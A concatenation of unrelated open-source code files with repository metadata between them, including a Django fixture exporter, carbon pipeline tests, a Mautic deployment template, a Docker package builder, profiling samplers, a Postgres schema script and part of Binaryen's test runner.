file_caracteristica.write("\t\t\"microComputer\" : " + str(item.microComputer_id) + ",\n")
file_caracteristica.write("\t\t\"length\" : " + str(item.length) + ",\n")
file_caracteristica.write("\t\t\"width\" : " + str(item.width) + ",\n")
file_caracteristica.write("\t\t\"weight\" : " + str(item.weight) + "\n")
file_caracteristica.write("\t}\n")
if qt > 1:
file_caracteristica.write("},\n")
else:
file_caracteristica.write("}\n")
qt -= 1
file_caracteristica.write("]\n")
file_caracteristica.close()
gpu = GPU.objects.filter()
file_gpu = open("iot/fixtures/gpu.json", "w")
file_gpu.write("[\n")
qt = len(gpu)
for item in gpu:
file_gpu.write("\t{\n")
file_gpu.write("\t\t\"model\": \"iot.GPU\",\n")
file_gpu.write("\t\t\"pk\": " + str(item.id) + ",\n")
file_gpu.write("\t\t\"fields\": {\n")
file_gpu.write("\t\t\"type\" : \"" + (item.type).encode("utf-8\n") + "\",\n")
file_gpu.write("\t\t\"clockSpeed\" : " + str(item.clockSpeed) + ",\n")
file_gpu.write("\t\t\"userCreation\" : " + str(item.userCreation_id) + ",\n")
file_gpu.write("\t\t\"userAmendment\" : " + str(item.userAmendment_id) + ",\n")
file_gpu.write("\t\t\"dateTimeCreation\" : \"" + str(item.dateTimeCreation) + "\",\n")
file_gpu.write("\t\t\"dateTimeChange\" : \"" + str(item.dateTimeChange) + "\"\n")
file_gpu.write("\t}\n")
if qt > 1:
file_gpu.write("},\n")
else:
file_gpu.write("}\n")
qt -= 1
file_gpu.write("]\n")
file_gpu.close()
memory = Memory.objects.filter()
file_memory = open("iot/fixtures/memory.json", "w")
file_memory.write("[\n")
qt = len(memory)
for item in memory:
file_memory.write("\t{\n")
file_memory.write("\t\t\"model\": \"iot.Memory\",\n")
file_memory.write("\t\t\"pk\": " + str(item.id) + ",\n")
file_memory.write("\t\t\"fields\": {\n")
file_memory.write("\t\t\"microComputer\" : " + str(item.microComputer_id) + ",\n")
file_memory.write("\t\t\"RAM\" : \"" + str(item.RAM) + "\",\n")
file_memory.write("\t\t\"SRAM\" : \"" + str(item.SRAM) + "\",\n")
file_memory.write("\t\t\"EEPROM\" : \"" + str(item.EEPROM) + "\",\n")
file_memory.write("\t\t\"flashMemory\" : \"" + str(item.flashMemory) + "\"\n")
file_memory.write("\t}\n")
if qt > 1:
print " > 1", qt
file_memory.write("},\n")
else:
print " == 1", qt
file_memory.write("}\n")
qt -= 1
file_memory.write("]\n")
file_memory.close()
voltage = Voltage.objects.filter()
file_voltage = open("iot/fixtures/voltage.json", "w")
file_voltage.write("[\n")
qt = len(voltage)
for item in voltage:
file_voltage.write("\t{\n")
file_voltage.write("\t\t\"model\": \"iot.Voltage\",\n")
file_voltage.write("\t\t\"pk\": " + str(item.id) + ",\n")
file_voltage.write("\t\t\"fields\": {\n")
file_voltage.write("\t\t\"microComputer\" : " + str(item.microComputer_id) + ",\n")
file_voltage.write("\t\t\"operatingVoltage\" : " + str(item.operatingVoltage) + ",\n")
file_voltage.write("\t\t\"inputVoltageRecommended\" : \"" + str(item.inputVoltageRecommended) + "\",\n")
file_voltage.write("\t\t\"IOCurrentMax\" : \"" + str(item.IOCurrentMax) + "\",\n")
file_voltage.write("\t\t\"DCCurrentfor3_3VPin\" : \"" + str(item.DCCurrentfor3_3VPin) + "\",\n")
file_voltage.write("\t\t\"powerRatings\" : \"" + str(item.powerRatings) + "\",\n")
file_voltage.write("\t\t\"powerSource\" : \"" + str(item.powerSource) + "\"\n")
file_voltage.write("\t}\n")
if qt > 1:
print " > 1", qt
file_voltage.write("},\n")
else:
print " == 1", qt
file_voltage.write("}\n")
qt -= 1
file_voltage.write("]\n")
file_voltage.close()
interface = Interface.objects.filter()
file_interface = open("iot/fixtures/interface.json", "w")
file_interface.write("[\n")
qt = len(interface)
for item in interface:
file_interface.write("\t{\n")
file_interface.write("\t\t\"model\": \"iot.Interface\",\n")
file_interface.write("\t\t\"pk\": \"" + str(item.id) + "\",\n")
file_interface.write("\t\t\"fields\": {\n")
file_interface.write("\t\t\"microComputer\" : " + str(item.microComputer_id) + ",\n")
file_interface.write("\t\t\"hdmi\" : \"" + (item.hdmi).encode("utf-8\n") + "\",\n")
file_interface.write("\t\t\"videoInput\" : \"" + (item.videoInput).encode("utf-8\n") + "\",\n")
file_interface.write("\t\t\"videoOutputs\" : \"" + (item.videoOutputs).encode("utf-8\n") + "\",\n")
file_interface.write("\t\t\"audioInputs\" : \"" + (item.audioInputs).encode("utf-8\n") + "\",\n")
file_interface.write("\t\t\"audioOutputs\" : \"" + (item.audioOutputs).encode("utf-8\n") + "\",\n")
file_interface.write("\t\t\"storage\" : \"" + (item.storage).encode("utf-8\n") + "\",\n")
file_interface.write("\t\t\"network\" : \"" + (item.network).encode("utf-8\n") + "\",\n")
file_interface.write("\t\t\"wifi\" : \"" + (item.wifi).encode("utf-8\n") + "\",\n")
file_interface.write("\t\t\"jack\" : \"" + (item.jack).encode("utf-8\n") + "\",\n")
file_interface.write("\t\t\"GPIO\" : \"" + (item.GPIO).encode("utf-8\n") + "\",\n")
file_interface.write("\t\t\"digitalIOPins\" : " + str(item.digitalIOPins) + ",\n")
file_interface.write("\t\t\"analogInputPins\" : " + str(item.analogInputPins) + "\n")
file_interface.write("\t}\n")
if qt > 1:
file_interface.write("},\n")
else:
file_interface.write("}\n")
qt -= 1
file_interface.write("]\n")
file_interface.close()
processor = Processor.objects.filter()
file_processor = open("iot/fixtures/processor.json", "w")
file_processor.write("[\n")
qt = len(processor)
for item in processor:
file_processor.write("\t{\n")
file_processor.write("\t\t\"model\": \"iot.Processor\",\n")
file_processor.write("\t\t\"pk\": " + str(item.id) + ",\n")
file_processor.write("\t\t\"fields\": {\n")
file_processor.write("\t\t\"type\" : \"" + (item.type).encode("utf-8\n") + "\",\n")
file_processor.write("\t\t\"clockSpeed\" : " + str(item.clockSpeed) + ",\n")
file_processor.write("\t\t\"userCreation\" : " + str(item.userCreation_id) + ",\n")
file_processor.write("\t\t\"userAmendment\" : " + str(item.userAmendment_id) + ",\n")
file_processor.write("\t\t\"dateTimeCreation\" : \"" + str(item.dateTimeCreation) + "\",\n")
file_processor.write("\t\t\"dateTimeChange\" : \"" + str(item.dateTimeChange) + "\"\n")
file_processor.write("\t}\n")
if qt > 1:
file_processor.write("},\n")
else:
file_processor.write("}\n")
qt -= 1
file_processor.write("]\n")
file_processor.close()
sensor = Sensor.objects.filter()
file_sensor = open("iot/fixtures/sensor.json", "w")
file_sensor.write("[\n")
qt = len(sensor)
for item in sensor:
file_sensor.write("\t{\n")
file_sensor.write("\t\t\"model\": \"iot.Sensor\",\n")
file_sensor.write("\t\t\"pk\": " + str(item.id) + ",\n")
file_sensor.write("\t\t\"fields\": {\n")
file_sensor.write("\t\t\"name\" : \"" + (item.name).encode("utf-8\n") + "\",\n")
file_sensor.write("\t\t\"serialNumber\" : \"" + (item.serialNumber).encode("utf-8\n") + "\",\n")
file_sensor.write("\t\t\"model\" : \"" + (item.model).encode("utf-8\n") + "\",\n")
file_sensor.write("\t\t\"function\" : \"" + (item.function).encode("utf-8\n") + "\"\n")
file_sensor.write("\t}\n")
if qt > 1:
file_sensor.write("},\n")
else:
file_sensor.write("}\n")
qt -= 1
file_sensor.write("]\n")
file_sensor.close()
template = Template.objects.filter()
file_template = open("iot/fixtures/template.json", "w")
file_template.write("[\n")
qt = len(template)
for item in template:
file_template.write("\t{\n")
file_template.write("\t\t\"model\": \"iot.Template\",\n")
file_template.write("\t\t\"pk\": " + str(item.id) + ",\n")
file_template.write("\t\t\"fields\": {\n")
file_template.write("\t\t\"name\" : \"" + (item.name).encode("utf-8\n") + "\",\n")
file_template.write("\t\t\"imagePath\" : \"" + (item.imagePath).encode("utf-8\n") + "\"\n")
#---------------------------------------------------- for i in template:
#--------------------------------------- for j in i.equipment.all():
# file_template.write("\t\t\"equipment\" : " + str(j.id) + ",\n")
file_template.write("\t}\n")
if qt > 1:
file_template.write("},\n")
else:
file_template.write("}\n")
qt -= 1
file_template.write("]\n")
file_template.close()
return HttpResponse("Ficheiros gerados com sucesso!\n")
| gpl-2.0 | 4,508,458,142,560,889,300 | 44.974026 | 112 | 0.528477 | false | 3.185381 | false | false | false |
mleinart/carbon | lib/carbon/tests/test_service.py | 10 | 2820 | import exceptions
from mock import Mock, patch
from unittest import TestCase
from carbon import events, state
from carbon.pipeline import Processor, run_pipeline
from carbon.service import CarbonRootService, setupPipeline
from carbon.tests.util import TestSettings
class TestSetupPipeline(TestCase):
def setUp(self):
self.settings = TestSettings()
self.root_service_mock = Mock(CarbonRootService)
self.call_when_running_patch = patch('twisted.internet.reactor.callWhenRunning')
self.call_when_running_mock = self.call_when_running_patch.start()
def tearDown(self):
self.call_when_running_patch.stop()
state.pipeline_processors = []
events.metricReceived.handlers = []
events.metricGenerated.handlers = []
def test_run_pipeline_chained_to_metric_received(self):
setupPipeline([], self.root_service_mock, self.settings)
self.assertTrue(run_pipeline in events.metricReceived.handlers)
def test_run_pipeline_chained_to_metric_generated(self):
setupPipeline([], self.root_service_mock, self.settings)
self.assertTrue(run_pipeline in events.metricGenerated.handlers)
@patch('carbon.service.setupAggregatorProcessor')
def test_aggregate_processor_set_up(self, setup_mock):
setupPipeline(['aggregate'], self.root_service_mock, self.settings)
setup_mock.assert_called_once_with(self.root_service_mock, self.settings)
@patch('carbon.service.setupRewriterProcessor')
def test_rewrite_processor_set_up(self, setup_mock):
setupPipeline(['rewrite:pre'], self.root_service_mock, self.settings)
setup_mock.assert_called_once_with(self.root_service_mock, self.settings)
@patch('carbon.service.setupRelayProcessor')
def test_relay_processor_set_up(self, setup_mock):
setupPipeline(['relay'], self.root_service_mock, self.settings)
setup_mock.assert_called_once_with(self.root_service_mock, self.settings)
@patch('carbon.service.setupWriterProcessor')
def test_write_processor_set_up(self, setup_mock):
setupPipeline(['write'], self.root_service_mock, self.settings)
setup_mock.assert_called_once_with(self.root_service_mock, self.settings)
def test_unknown_processor_raises_value_error(self):
self.assertRaises(
exceptions.ValueError, setupPipeline, ['foo'], self.root_service_mock, self.settings)
@patch('carbon.service.setupRewriterProcessor', new=Mock())
def test_parses_processor_args(self):
    #XXX Patch doesn't work on this import directly
rewrite_mock = Mock()
Processor.plugins['rewrite'] = rewrite_mock
setupPipeline(['rewrite:pre'], self.root_service_mock, self.settings)
rewrite_mock.assert_called_once_with('pre')
def test_schedules_pipeline_ready(self):
setupPipeline([], self.root_service_mock, self.settings)
self.assertTrue(self.call_when_running_mock.called)
| apache-2.0 | -5,603,275,408,449,106,000 | 41.727273 | 93 | 0.753546 | false | 3.624679 | true | false | false |
Barmaley13/BA-Software | gate/main.py | 1 | 3867 | """
Some Main Functions
"""
### INCLUDES ###
import os
import bottle
import logging
from tornado import ioloop
from .common import CWD, TPL_FOLDER, OPTIONS_PARSER
from .system import SystemSettings
from .web import WebServer
from .web.socket import WebsocketManager
from .sleepy_mesh import SleepyMeshManager
### CONSTANTS ###
AES_RESET_DELAY = 3.0 # seconds
### MAIN FUNCTION ###
def main(system_options):
""" Main function """
# Make some variables accessible to html templates
global manager, system_settings, pages, users, snmp_agents, snmp_commands, snmp_traps
# Set current working directory
os.chdir(CWD)
# print('CWD: {}'.format(CWD))
# Set default logging across all modules
logging.basicConfig(level=logging.ERROR)
# Set default bottle Template Path
# del bottle.TEMPLATE_PATH[:]
bottle.TEMPLATE_PATH.append(TPL_FOLDER)
    # Create and start Sleepy Mesh Manager (System Settings starts modbus if it is enabled)
system_settings = SystemSettings(system_options)
manager = SleepyMeshManager(
system_settings=system_settings,
websocket=WebsocketManager(),
snmp_websocket=WebsocketManager()
)
manager.start()
# Forward SNMP Agents/Commands/Traps to templates
snmp_agents = manager.snmp_server.agents
snmp_commands = manager.snmp_server.commands
snmp_traps = manager.snmp_server.traps
# Create Web Server
# Web server is a loop, sleepy mesh manager scheduler is based on the same loop as well
web_server = WebServer(manager)
# Share some variables with html templates variables
pages = web_server.pages
users = web_server.pages.users
# Start Web Server
web_server.start()
    # If we are here it means that the program has been terminated, so stop the modbus and snmp servers
manager.modbus_server.stop()
manager.snmp_server.stop()
def reset_aes_settings(reset_complete_callback=None):
""" Reset AES settings (if needed) """
global manager
# Set current working directory
os.chdir(CWD)
# print('CWD: {}'.format(CWD))
# Set default logging across all modules
logging.basicConfig(level=logging.ERROR)
# Create System Options
(system_options, args) = OPTIONS_PARSER.parse_args()
# Disable modbus and snmp servers
system_options.modbus_enable = False
system_options.snmp_enable = False
# Create and start Sleepy Mesh Manager
system_settings = SystemSettings(system_options)
manager = SleepyMeshManager(
system_settings=system_settings,
websocket=WebsocketManager(),
snmp_websocket=WebsocketManager()
)
# Dynamically creating AES reset function so we can incorporate delay
def _aes_reset():
""" Nested AES Reset """
# Dynamically creating reset complete callback
def _reset_complete_callback():
""" Nested Reset Complete Callback """
# Stopping Scheduler
manager.stop_scheduler()
# Stopping Tornado Server
ioloop.IOLoop.instance().stop()
if reset_complete_callback is not None:
reset_complete_callback()
manager.reset_network(complete_callback=_reset_complete_callback)
# Monkey Patching Scheduler
old_start_scheduler = manager.init_scheduler
def monkey_patched_init_scheduler():
""" Monkey patching Init Scheduler to include AES Reset """
old_start_scheduler()
manager.bridge.schedule(AES_RESET_DELAY, _aes_reset)
manager.init_scheduler = monkey_patched_init_scheduler
# Delete all active nodes
nodes = manager.platforms.select_nodes('active').values()
for node in nodes:
manager.platforms.delete_node(node)
node.delete()
# Starting Scheduler
manager.start()
# Starting Tornado
ioloop.IOLoop.instance().start()
| gpl-3.0 | 6,033,919,358,536,055,000 | 28.295455 | 91 | 0.683993 | false | 4.171521 | false | false | false |
nicolas-petit/clouder | clouder_template_mautic/template.py | 1 | 3846 | # -*- coding: utf-8 -*-
##############################################################################
#
# Author: Yannick Buron
# Copyright 2015, TODAY Clouder SASU
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License with Attribution
# clause as published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License with
# Attribution clause along with this program. If not, see
# <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp import models, api, modules
class ClouderContainer(models.Model):
"""
Add methods to manage the mautic specificities.
"""
_inherit = 'clouder.container'
@api.multi
def deploy_post(self):
super(ClouderContainer, self).deploy_post()
if self.application_id.type_id.name == 'mautic':
package_name = self.image_id.current_version + '.zip'
self.execute(
['wget', '-q', 'https://s3.amazonaws.com/mautic/releases/' + package_name,
], path='/var/www/', username='www-data')
self.execute(['unzip', package_name],
path='/var/www', username='www-data')
self.execute(['rm', package_name],
path='/var/www', username='www-data')
#INSTALLATION FROM SOURCE
# self.execute(
# ['git', 'clone', '--branch', self.image_id.current_version, 'https://github.com/mautic/mautic.git'
# ], path='/var/www/', username='www-data')
# self.execute(
# ['composer', 'install'], path='/var/www/mautic', username='www-data')
class ClouderBase(models.Model):
"""
Add methods to manage the mautic specificities.
"""
_inherit = 'clouder.base'
@api.multi
def deploy_build(self):
"""
Configure nginx.
"""
res = super(ClouderBase, self).deploy_build()
if self.application_id.type_id.name == 'mautic':
config_file = '/etc/nginx/sites-available/' + self.fullname
self.container_id.send(
modules.get_module_path('clouder_template_mautic') +
'/res/nginx.config', config_file)
self.container_id.execute(['sed', '-i', '"s/BASE/' + self.name + '/g"',
config_file])
self.container_id.execute(['sed', '-i',
'"s/DOMAIN/' + self.domain_id.name + '/g"',
config_file])
self.container_id.execute(['ln', '-s',
'/etc/nginx/sites-available/' + self.fullname,
'/etc/nginx/sites-enabled/' + self.fullname])
self.container_id.execute(['/etc/init.d/nginx', 'reload'])
return res
@api.multi
def purge_post(self):
"""
Purge from nginx configuration.
"""
super(ClouderBase, self).purge_post()
if self.application_id.type_id.name == 'mautic':
self.container_id.execute(['rm', '-rf',
'/etc/nginx/sites-enabled/' + self.fullname])
self.container_id.execute([
'rm', '-rf', '/etc/nginx/sites-available/' + self.fullname])
self.container_id.execute(['/etc/init.d/nginx', 'reload'])
| gpl-3.0 | -5,302,512,788,083,574,000 | 38.649485 | 124 | 0.541082 | false | 4.087141 | true | false | false |
bioothod/zbuilder | zbuilder.py | 1 | 7249 | #!/usr/bin/python
import argparse
import docker
import json
import logging
import os
import shutil
import sys
logging.basicConfig(format='%(asctime)s %(levelname)s: %(message)s', level=logging.INFO)
class zbuilder():
def __init__(self, config):
js = json.load(config)
self.docker_files = []
self.build_succeeded_file = "/tmp/build_succeeded"
packages = js.get("packages")
if not packages:
logging.error("core: there is no 'packages' object, nothing to build")
return
logging.info("Starting parse different build types")
for package_type, package in packages.items():
images = []
if package_type == "deb":
img = js.get("deb-images")
if img:
images += img
elif package_type == "rpm":
img = js.get("rpm-images")
if img:
images += img
else:
logging.error("%s: unsupported package type", package_type)
continue
logging.info("%s: starting to parse commands", package_type)
pre_build_commands = package.get("pre-build-commands")
build_commands = package.get("build-commands")
if build_commands:
build_commands.append("echo success > %s" % (self.build_succeeded_file))
post_build = package.get("post-build-commands")
final_commands = {}
if post_build:
pbs = post_build.get("success")
if pbs:
final_commands["success"] = pbs
pbf = post_build.get("fail")
if pbf:
final_commands["fail"] = pbf
pba = post_build.get("always")
if pba:
final_commands["always"] = pba
sources = package.get("sources")
if not sources:
logging.error("%s: there is no 'sources' object, nothing to build", package_type)
break
for name, source in sources.items():
logging.info("%s/%s: starting to parse source", package_type, name)
include_images = source.get("include-images")
if include_images:
images += include_images
exclude_images = source.get("exclude-images")
if exclude_images:
tmp = []
for x in images:
if x in exclude_images:
continue
tmp.append(x)
images = tmp
logging.info("%s/%s: images: %s", package_type, name, ', '.join(images))
fetch_commands = []
try:
stype = source["type"]
repo = source["repository"]
branch = source.get("branch", "master")
if stype == "git":
fetch_commands.append("rm -rf %s" % (name))
fetch_commands.append("git clone %s %s" % (repo, name))
fetch_commands.append("cd %s" % (name))
fetch_commands.append("git checkout %s" % (branch))
build_commands.append("cd %s" % (name))
else:
logging.error("%s/%s: unsupported source type '%s'", package_type, name, stype)
continue
except Exception as e:
logging.error("%s/%s: invalid source: %s", package_type, name, e)
continue
logging.info("%s/%s: fetch commands: %s", package_type, name, ', '.join(fetch_commands))
commands = []
try:
commands.append(pre_build_commands)
commands.append(fetch_commands)
commands.append(build_commands)
except Exception as e:
logging.notice("%s/%s: could not append command: %s", package_type, name, e)
for image in images:
df = self.generate_dockerfile(name, image, commands, final_commands)
self.docker_files.append(df)
def generate_dockerfile(self, name, image, commands, final_commands):
df = "Dockerfile.%s.%s" % (name, image)
with open(df, 'w+') as f:
f.write("FROM %s\n" % (image))
f.write("ENV ZBUILDER_IMAGE=%s ZBUILDER_NAME=%s DEBIAN_FRONTEND=noninteractive\n" % (image, name))
f.write("ADD conf.d conf.d\n")
for cmd_set in commands:
cs = "RUN %s\n" % (' && \\\n'.join(cmd_set))
f.write(cs)
success = final_commands.get("success")
if success:
cs = "RUN test -f %s && \\\n %s\n" % (self.build_succeeded_file, ' && \\\n'.join(success))
f.write(cs)
fail = final_commands.get("fail")
if fail:
cs = "RUN test -f %s || \\\n %s\n" % (self.build_succeeded_file, ' && \\\n'.join(fail))
f.write(cs)
always = final_commands.get("always")
if always:
cs = "RUN %s\n" % ' && \\\n'.join(always)
f.write(cs)
return df
def run(self, name = None, build_dir = '.'):
c = docker.Client(base_url='unix://var/run/docker.sock')
for path in self.docker_files:
if name and not name in path:
continue
try:
shutil.rmtree(path="%s/" % build_dir, ignore_errors=True)
os.mkdir("%s/" % build_dir)
shutil.copy(path, "%s/" % build_dir)
shutil.copytree("conf.d", "%s/conf.d" % build_dir)
except Exception as e:
logging.error("Could not copy local content to destination build dir %s: %s",
build_dir, e)
continue
with open("%s.build.log" % (path), "w+") as out:
response = c.build(path=build_dir, dockerfile=path, rm=False, pull=False, forcerm=False)
for r in response:
out.write(r)
logging.info("%s: %s", path, r)
if __name__ == '__main__':
bparser = argparse.ArgumentParser(description='Builder arguments.', add_help=True)
bparser.add_argument("--conf", dest='conf', action='store', type=argparse.FileType('r'),
required=True, help='Input config file.')
bparser.add_argument("--build-dir", dest='build_dir', action='store', default=".",
help='Local directory where build process will run.')
bparser.add_argument("--image", dest='image', action='store',
help='Build only images containing this substring.')
args = bparser.parse_args()
try:
zb = zbuilder(config=args.conf)
try:
zb.run(name=args.image, build_dir=args.build_dir)
except Exception as e:
logging.error("Could not run build, name: %s: %s", args.image, e)
except Exception as e:
logging.error("Could not create zbuilder object: %s", e)
| apache-2.0 | 5,666,204,978,273,247,000 | 37.973118 | 110 | 0.497448 | false | 4.241662 | false | false | false |
libretees/libreshop | libreshop/addresses/views.py | 1 | 1420 | import logging
from django.contrib.gis.geoip2 import GeoIP2
from django.views.generic import FormView
from ipware.ip import get_real_ip
from .forms import AddressForm
# Initialize logger.
logger = logging.getLogger(__name__)
# Create your views here.
class AddressFormView(FormView):
template_name = 'addresses/address_form.html'
success_url = '/'
def get_form(self):
'''
Get the Form object that will be supplied to the FormView's context.
'''
# Instantiate Form.
form = AddressForm(**self.get_form_kwargs())
# Determine the IP address associated to the HTTP Request.
ip_address = get_real_ip(self.request)
# Populate the form's `country` field with the user's apparent location.
if ip_address and not form.is_bound:
geo_ip2 = GeoIP2()
location = geo_ip2.country(ip_address)
form.fields['country'].initial = location['country_code']
return form
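    # For example (illustrative only): a visitor whose IP geolocates to
    # {'country_code': 'US', ...} ends up with
    # form.fields['country'].initial == 'US' on an unbound form.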
class ShippingAddressFormView(AddressFormView):
def form_valid(self, form):
self.request.session['shipping_address'] = form.cleaned_data
return super(ShippingAddressFormView, self).form_valid(form)
class BillingAddressFormView(AddressFormView):
def form_valid(self, form):
self.request.session['billing_address'] = form.cleaned_data
return super(BillingAddressFormView, self).form_valid(form)
| gpl-3.0 | -5,674,709,576,269,259,000 | 29.869565 | 80 | 0.680986 | false | 3.955432 | false | false | false |
what-studio/profiling | profiling/sampling/samplers.py | 1 | 3407 | # -*- coding: utf-8 -*-
"""
profiling.sampling.samplers
~~~~~~~~~~~~~~~~~~~~~~~~~~~
:copyright: (c) 2014-2017, What! Studio
:license: BSD, see LICENSE for more details.
"""
from __future__ import absolute_import
import functools
import signal
import sys
import threading
import weakref
import six.moves._thread as _thread
from profiling.utils import deferral, Runnable, thread_clock
__all__ = ['Sampler', 'ItimerSampler', 'TracingSampler']
INTERVAL = 1e-3 # 1ms
class Sampler(Runnable):
"""The base class for samplers."""
#: Sampling interval.
interval = INTERVAL
def __init__(self, interval=INTERVAL):
self.interval = interval
class ItimerSampler(Sampler):
"""Uses ``signal.ITIMER_PROF`` to sample running frames.
.. note::
       ``signal.SIGPROF`` is triggered only by the main thread. If you need
       to sample multiple threads, use :class:`TracingSampler` instead.
"""
def handle_signal(self, profiler, signum, frame):
profiler.sample(frame)
def run(self, profiler):
weak_profiler = weakref.proxy(profiler)
handle = functools.partial(self.handle_signal, weak_profiler)
t = self.interval
with deferral() as defer:
prev_handle = signal.signal(signal.SIGPROF, handle)
if prev_handle == signal.SIG_DFL:
                # Sometimes the process receives SIGPROF even after the sampler
                # unsets the itimer. If the previous handler was SIG_DFL, the
                # process would crash on receiving SIGPROF. To prevent this
                # risk, make the process ignore SIGPROF while the sampler isn't
                # running if the previous handler was SIG_DFL.
prev_handle = signal.SIG_IGN
defer(signal.signal, signal.SIGPROF, prev_handle)
prev_itimer = signal.setitimer(signal.ITIMER_PROF, t, t)
defer(signal.setitimer, signal.ITIMER_PROF, *prev_itimer)
yield
class TracingSampler(Sampler):
"""Uses :func:`sys.setprofile` and :func:`threading.setprofile` to sample
running frames per thread. It can be used at systems which do not support
profiling signals.
Just like :class:`profiling.tracing.timers.ThreadTimer`, `Yappi`_ is
required for earlier than Python 3.3.
.. _Yappi: https://code.google.com/p/yappi/
"""
def __init__(self, *args, **kwargs):
super(TracingSampler, self).__init__(*args, **kwargs)
self.sampled_times = {}
self.counter = 0
def _profile(self, profiler, frame, event, arg):
t = thread_clock()
thread_id = _thread.get_ident()
sampled_at = self.sampled_times.get(thread_id, 0)
if t - sampled_at < self.interval:
return
self.sampled_times[thread_id] = t
profiler.sample(frame)
self.counter += 1
if self.counter % 10000 == 0:
self._clear_for_dead_threads()
def _clear_for_dead_threads(self):
for thread_id in sys._current_frames().keys():
self.sampled_times.pop(thread_id, None)
def run(self, profiler):
profile = functools.partial(self._profile, profiler)
with deferral() as defer:
sys.setprofile(profile)
defer(sys.setprofile, None)
threading.setprofile(profile)
defer(threading.setprofile, None)
yield
| bsd-3-clause | -1,046,786,313,325,832,400 | 29.693694 | 78 | 0.6199 | false | 3.858437 | false | false | false |
tmrts/Solomon | config/schema.py | 1 | 2279 | #!/usr/bin/python
# -*- coding: utf-8 -*-
import psycopg2
import sys
con = None
try:
con = psycopg2.connect(host="localhost", dbname="solomon_db", user="solomon_user", password="solomon")
cur = con.cursor()
cur.execute('CREATE EXTENSION IF NOT EXISTS "uuid-ossp"')
cur.execute('DROP TABLE IF EXISTS log_visit')
cur.execute(r'''CREATE TABLE log_visit(visitor_number SERIAL NOT NULL,
visitor_id UUID NOT NULL PRIMARY KEY,
visitor_country TEXT NOT NULL,
visitor_city TEXT NOT NULL,
visitor_first_action_time TIMESTAMP WITH TIME ZONE NOT NULL,
visitor_last_action_time TIMESTAMP WITH TIME ZONE NOT NULL,
visitor_returning BOOLEAN NOT NULL,
visit_count SMALLINT NOT NULL,
referer_url TEXT,
referer_keyword TEXT,
config_os CHAR(10) NOT NULL,
config_browser_name CHAR(15) NOT NULL,
config_browser_version CHAR(20) NOT NULL,
config_resolution CHAR(9) NOT NULL,
location_ip CIDR
)''')
cur.execute('DROP TABLE IF EXISTS log_metrics')
cur.execute(r'''CREATE TABLE log_metrics(daily_date DATE NOT NULL PRIMARY KEY DEFAULT CURRENT_DATE,
daily_bit_array BIT VARYING NOT NULL DEFAULT '0'
)''')
cur.execute('DROP TABLE IF EXISTS log_websocket')
cur.execute(r'''CREATE TABLE log_websocket(websocket_use_id SERIAL NOT NULL PRIMARY KEY,
visitor_id UUID NOT NULL REFERENCES log_visit(visitor_id)
)''')
con.commit()
finally:
if con:
con.close()
| gpl-2.0 | 8,207,408,570,716,270,000 | 38.696429 | 106 | 0.442299 | false | 5.324766 | false | true | false |
WebAssembly/binaryen | check.py | 2 | 16499 | #!/usr/bin/env python3
#
# Copyright 2015 WebAssembly Community Group participants
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import glob
import os
import subprocess
import sys
import unittest
from collections import OrderedDict
from scripts.test import binaryenjs
from scripts.test import lld
from scripts.test import shared
from scripts.test import support
from scripts.test import wasm2js
from scripts.test import wasm_opt
def get_changelog_version():
with open(os.path.join(shared.options.binaryen_root, 'CHANGELOG.md')) as f:
lines = f.readlines()
lines = [l for l in lines if len(l.split()) == 1]
lines = [l for l in lines if l.startswith('v')]
version = lines[0][1:]
print("Parsed CHANGELOG.md version: %s" % version)
return int(version)
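# For reference (illustrative): the parser above expects CHANGELOG.md to mark
# releases with single-token lines such as "v101"; the first such line is the
# most recent release, so it parses to the integer 101.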
def run_version_tests():
print('[ checking --version ... ]\n')
not_executable_suffix = ['.txt', '.js', '.ilk', '.pdb', '.dll', '.wasm', '.manifest', 'binaryen-lit']
bin_files = [os.path.join(shared.options.binaryen_bin, f) for f in os.listdir(shared.options.binaryen_bin)]
executables = [f for f in bin_files if os.path.isfile(f) and not any(f.endswith(s) for s in not_executable_suffix)]
executables = sorted(executables)
assert len(executables)
changelog_version = get_changelog_version()
for e in executables:
print('.. %s --version' % e)
out, err = subprocess.Popen([e, '--version'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE).communicate()
out = out.decode('utf-8')
err = err.decode('utf-8')
assert len(err) == 0, 'Expected no stderr, got:\n%s' % err
assert os.path.basename(e).replace('.exe', '') in out, 'Expected version to contain program name, got:\n%s' % out
assert len(out.strip().splitlines()) == 1, 'Expected only version info, got:\n%s' % out
parts = out.split()
assert parts[1] == 'version'
version = int(parts[2])
assert version == changelog_version
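# For reference (illustrative): run_version_tests above expects each tool's
# --version output to be a single line beginning "<tool-name> version <N>",
# e.g. "wasm-opt version 101", with <N> matching the CHANGELOG version.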
def run_wasm_dis_tests():
print('\n[ checking wasm-dis on provided binaries... ]\n')
for t in shared.get_tests(shared.options.binaryen_test, ['.wasm']):
print('..', os.path.basename(t))
cmd = shared.WASM_DIS + [t]
if os.path.isfile(t + '.map'):
cmd += ['--source-map', t + '.map']
actual = support.run_command(cmd)
shared.fail_if_not_identical_to_file(actual, t + '.fromBinary')
# also verify there are no validation errors
def check():
cmd = shared.WASM_OPT + [t, '-all']
support.run_command(cmd)
shared.with_pass_debug(check)
def run_crash_tests():
print("\n[ checking we don't crash on tricky inputs... ]\n")
for t in shared.get_tests(shared.get_test_dir('crash'), ['.wast', '.wasm']):
print('..', os.path.basename(t))
cmd = shared.WASM_OPT + [t]
# expect a parse error to be reported
support.run_command(cmd, expected_err='parse exception:', err_contains=True, expected_status=1)
def run_dylink_tests():
print("\n[ we emit dylink sections properly... ]\n")
dylink_tests = glob.glob(os.path.join(shared.options.binaryen_test, 'dylib*.wasm'))
for t in sorted(dylink_tests):
print('..', os.path.basename(t))
cmd = shared.WASM_OPT + [t, '-o', 'a.wasm']
support.run_command(cmd)
